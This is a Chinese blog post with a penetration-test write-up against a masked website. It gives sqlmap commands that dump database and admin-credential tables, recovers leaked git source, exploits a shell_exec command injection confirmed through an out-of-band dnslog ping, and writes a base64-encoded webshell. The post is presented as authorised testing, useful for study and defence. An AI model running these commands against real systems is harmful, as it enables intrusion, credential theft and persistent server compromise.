SQL 登录注入脚本_项目实战 | SQL注入的“格局”

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量154 收藏
点赞数
文章标签: SQL 登录注入脚本

b2362a2d0b785a2cfe0a6c9a506e3538.gif

文章来源:安译Sec

0x00 前言

曾经搞站最经典的套路就是:注入拿到密码进后台,上传shell然后内核提权。但是实际环境中,往往会有注入后密码解不开、找不到后台等情况,所以现在有的师傅说sql注入还不如xss。

0x01 详细步骤

一.网站界面就不放了,打码太累了,直接跳到随意点点后发现可疑参数,并确定存在漏洞的截图。

and 1=1页面显示正常,and 1=0页面变空白确定存在数字型注入,order by确定共4列,最后用select 1,2,3,4确定第2列回显。

a7c710bd420ea8075ef05bdf1592996a.png

二.之前探测发现没有waf,那就直接sqlmap一把梭。

跑当前库名:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --current-db跑所有数据库名:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --dbs标绿色的为当前数据库:xxx_history
e71a16982e209992b89a3ed52bb89b07.png

三. 跑当前数据库表名。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history --table

标绿色的表为我认为是存放管理员数据的表:

a8f091de1d2893d864cfd00575ee1094.png

四.直接拖管理表的数据。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history -T administrators --dump

03c5d31dcaed0b77f14490b5072776ed.png

居然是明文密码,现在明文密码很少见了,不过考虑到目标网站有点历史悠久,也能理解。

五.虽然获得了管理员密码,但是找不到后台,常用的/admin、/login、/manage都试了。

b79fa32eb96f8fb1d841b0849fe48728.png

六.用脚本扫目录,字典用的是御剑的标准字典。得到以下敏感目录(截图不全)。

f20a9af45a94d3718302d5b294400499.png

七.git目录存在即git源码泄露漏洞,用GitHack脚本恢复了整站源码,一大坨,截图就不放了,放个数字你们感受下。

python2 GitHack.py https://www.马赛克.com/.git/

59350fcbd711818ff41e48e0978103ba.png

八.根据名字确定其中疑似后台的目录:

4227e499def5caaa7d9f5b71739237c4.png

九.访问试试,/admin1已经404了,因为git中留存的是历史代码,所以目录被改名或删除都有可能。

380f497aec2734ab04f5f38e0ae0531d.png

十./7mysql7需要输入密码,试了不是之前注出的密码。

03add17771dfd37d6ac213073ca56f44.png

十一.xxxquestions目录下的wp-admin倒是可以进,但是也不是之前注出的密码。

8c1f3264028783f57e79806a9e4cbc83.png

十二.之前看到还有个xxx_questions数据库,再用sqlmap去跑一下试试:

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions --tables

69d21f4aff846066492efb4ae3468f01.png

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions -T wp_users --dump

5f2a6baf04d9ca97293a95ec180ddac1.png

十三.这种加密是wordpress特有的加密,cmd5有针对该框架的解密,但是这个密码似乎太复杂,解不出。

9a0f020876949e2d0ce7488407b0002e.png

十四.至此sql注入后有密码找不到后台、有后台解不开密码的情况就都碰到了。渗透似乎陷入僵局,没关系,手里的源码还有利用价值,拖到D盾里自动审计一下。

fe044d314d853382a9e332f9587e37c3.png

十五.访问那个级别5的已知后门,原来已经被人日过了,是个黑页:hacked by XXX。这个网站比较有历史了,可能这个黑页也是很多年前的某个娱乐圈黑客搞的。

8d0fa749961830c341651d6cde7f611f.png

十六.访问级别4的shell_exec后门,是个空白页面,查看手中的源代码,发现是一个备份脚本,有可能是同行留的,也有可能是没有安全意识的管理员自己写的。后面那种可能性比较大。

f24549ca80ca38f55fa2bc219c84b6be.png

十七.脚本逻辑:接收了POST的filename参数,然后执行打包备份,但是参数传进shell_exec之前没有做过滤,产生了命令执行的漏洞。用linux的命令连接符分号,可以在后面拼接任意命令,这里尝试一下执行whoami,但是还是空白页面。

573d2f39011c3e67590e19bb8409c2c9.png

十八.想到是因为shell_exec函数没有回显,也不知道命令执行成功没有,这里我们用公开免费的dnslog平台去接收没有回显的注入:

http://www.dnslog.cn/,用法如下:

先点击Get SubDomain在平台获取一个域名

4b30bc29f0e23dbc1b7616bdb663c67d.png

十九.然后执行ping命令,反撇号中的命令会自动执行并返回命令执行的结果拼接到命令里,linux系统使用ping命令要加-c指定次数,不然会一直ping个没完。

25b1d9e19108773cff6bd59942bff59a.png

二十.去平台点击Refresh Record刷新(不要刷新整个网页),获取到解析日志。

d3328e29d8f87c6723f0c998e2d803f1.png

可以看到命令是执行成功了的。whoami的回显为www-data

二十一.确认了漏洞存在,接下来利用漏洞写一句话,注意因为一句话中包含特殊字符,要编码后写入,payload如下

echo base64编码后的一句话|base64 -d > shell.php

(实战中不要用这个文件名,有授权的测试随便,但要注意文件名对waf来说也是一种特征)

f2a85d76430f738d0e96098cbe996fa1.png

二十二.写马成功

80a1a05178ffcd2b7600484712aef61d.png

二十三.客户没有授权内网,项目结束。

9d846d69c55f12b96b79cc44f5b584d3.png

d4d52247d1cdbdb621fc48af38bcf09d.png

推荐文章++++

c1033d43bd5e338782e69e9255a558ca.png

*SQLiScanner-SQL注入扩展扫描工具

*Django GIS SQL注入漏洞

*SQL注入类型

b344273e1ebe919c10f2eff5315fe250.png

3a781f960ed41bf9b9d81afe94dc7e54.gif

weixin_39531378
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
SQL 登录注入脚本_深圳嘉华学校之SQL 注入
weixin_39636540的博客
11-21 104
SQL Server 2005 联机丛书 SQL Injection 是一种攻击方法,它可以将恶意代码插入到以后将传递给 SQL Server 供分析和执行的字符串中。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。 SQL Injection 的主要形式包括直接将代码插入与 SQL 命令串联并执行的用户输入变量。一种间接的攻击会将...
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1341
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
全手工SQL注入脚本整理
传说中的蒙面大侠
01-17 1417
        1.判断是否有注入;and 1=1 ;and 1=2          2.初步判断是否是mssql ;and user>0   3.注入参数是字符and [查询条件] and =   4.搜索时没过滤参数的and [查询条件] and %25=   5.判断数据库系统   ;and (select count(*) from sysob
SQL 注入脚本学习笔记
二进制的博客
10-11 1357
什么是SQL注入,如何理解SQL注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法expxxx.action?id=1 此时可以在id后加入sql语句进行注入 xxx.action?id=-1 or 1=1 此时查询的信息就是所有的信息SQL注入是怎么产生的? web开发人员无法保证所有的输入都已经过滤 攻击者利用发送给sql服务器的输入数据构造可执行的sql
sql登录注入
陈羽
09-06 468
注入式攻击的详细解释SQL下面我们将以一个简单的用户登陆为例,结合代码详细解释一下SQL注入式攻击,与及他的防范措施。对于一个简单的用户登陆可能的代码如下: try {  string strUserName = this.txtUserName.Text;  string strPwd = this.txtPwd.Text;  string strSql = "select * fro
SQL脚本_UI_sql注入_sql_
10-01
在IT行业中,SQL注入是一种常见的安全漏洞,攻击者利用它来操纵或窃取数据库中的敏感信息。本主题主要关注通过用户界面(UI)执行的SQL注入攻击,以及两种常见的注入技术:报错注入和基于布尔及时间的盲注。下面我们...
SQL.rar_sql injection_sql 注入_sql注入
09-14
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地构建SQL查询语句时,允许攻击者通过输入恶意数据来操纵数据库。在"SQL.rar"中,我们看到与SQL注入相关的资源,包括一个名为"SQL.cpp"的C++源代码文件,这...
SQL_zhuru.rar_sql 注入_sql注入
09-24
在"SQL_zhuru.rar_sql注入_sql注入"这个压缩包中,可能包含了关于如何识别、预防和应对SQL注入攻击的相关资料。 在"www.pudn.com.txt"文件中,可能包含了从Pudn网下载的关于SQL注入的技术文章、教程或案例分析。...
sql.rar_SQL注入_asp 防注入_sql注入_防破
09-22
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL语句来操纵数据库系统,获取敏感信息,甚至破坏整个数据库。在这个“sql.rar”压缩包中,我们重点关注的是如何防止这种攻击,尤其是针对ASP(Active...
基于python的sql注入脚本
03-04
适合刚学python和sql注入的人 import urllib2 import re
WEB登录sql注入 url注入 脚本注入
12-05
WEB登录sql注入 url注入 脚本注入
SQL注入脚本
ChiYanq7ng的博客
11-21 140
【代码】SQL注入脚本
sql注入脚本1
m0_55772907的博客
05-01 987
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
SQL注入脚本命令
ymebnqv99bj的专栏
05-20 498
1.判断是否有注入;and 1=1 ;and 1=2   2.初步判断是否是mssql ;and user>0   3.注入参数是字符'and [查询条件] and ''='   4.搜索时没过滤参数的'and [查询条件] and '%25'='   5.判断数据库系统   ;and (select count(*) from sysobjects)>0 mssql
SQL注入总结
10-20 234
 HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 1685
本文记录利用脚本来解决SQL注入的CTF题
sql枚举数据库注入脚本
superprintf的博客
10-02 327
一. 成果展示 假设我的数据库有这些 那么把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理 其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式 select * from users where id='-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //得到数据库名 select * from u
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值